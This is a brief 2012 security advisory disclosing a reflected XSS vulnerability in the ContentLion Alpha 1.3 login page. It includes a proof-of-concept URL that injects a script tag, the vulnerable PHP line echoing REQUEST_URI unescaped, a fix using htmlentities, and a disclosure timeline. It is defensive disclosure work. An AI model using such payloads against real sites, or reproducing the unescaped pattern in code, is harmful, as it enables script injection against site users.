Advisory:		ContentLion Alpha 1.3 XSS vulnerability
Advisory ID:		SSCHADV2012-004
Author:			Stefan Schurtz
Affected Software:	Successfully tested on ContentLion Alpha 1.3
Vendor URL:		http://www.contentlion.org/
Vendor Status:		informed

==========================
Vulnerability Description
==========================

ContentLion Alpha 1.3 is prone to a XSS vulnerability in the login page

==================
PoC-Exploit
==================

http://[target]/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script>

// vuln code in system/classes/login.php

if($_SESSION['user']->isGuest()){
            ?>
            <form action="<?PHP echo $_SERVER['REQUEST_URI']; ?>" method="POST">
=========
Solution
=========

if($_SESSION['user']->isGuest()){
            ?>
            <form action="<?PHP echo htmlentities($_SERVER['REQUEST_URI']); ?>" method="POST">

====================
Disclosure Timeline
====================

01-Feb-2012 - vendor informed
01-Feb-2012 - feedback from vendor

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-004.txt